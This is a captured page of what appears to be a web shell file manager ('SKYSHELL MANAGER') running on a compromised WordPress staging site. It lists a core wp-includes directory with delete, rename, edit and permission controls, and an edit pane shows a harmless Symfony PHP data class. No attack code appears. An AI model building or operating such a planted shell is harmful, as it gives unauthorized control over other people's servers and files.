📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: IssueData.php
<?php namespace App\Model; use Symfony\Component\Validator\Constraints as Assert; class IssueData { public function __construct( #[Assert\NotBlank] public string $domain, #[Assert\Email] public string $email, #[Assert\Valid] public Certitificate $cert, ) { } } class Certitificate { public function __construct( #[Assert\NotBlank] public readonly int $nc_id, #[Assert\NotBlank] public readonly string $type, public readonly int $years = 1, ) { } }
Save